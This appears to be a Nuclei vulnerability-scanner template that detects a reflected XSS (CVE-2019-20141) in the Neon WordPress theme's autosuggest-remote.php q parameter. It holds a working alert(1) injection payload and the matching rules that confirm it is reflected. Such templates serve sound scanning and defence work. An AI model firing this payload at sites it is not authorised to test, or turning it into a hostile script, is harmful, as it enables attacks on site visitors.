nuclei-templates/cves/CVE-2019-20141.yaml

28 lines
813 B
YAML

id: cve-2019-20141
info:
name: Neon Dashboard - XSS Reflected
author: knassar702
severity: medium
description: |
An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
Source/References:
- https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
requests:
- method: GET
path:
- "{{BaseURL}}/data/autosuggest-remote.php?q=<img%20src=x%20onerror=alert(1)>"
- "{{BaseURL}}/admin/data/autosuggest-remote.php?q=<img%20src=x%20onerror=alert(1)>"
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(1)>"
part: body
- type: word
words:
- "application/json"
part: header
negative: true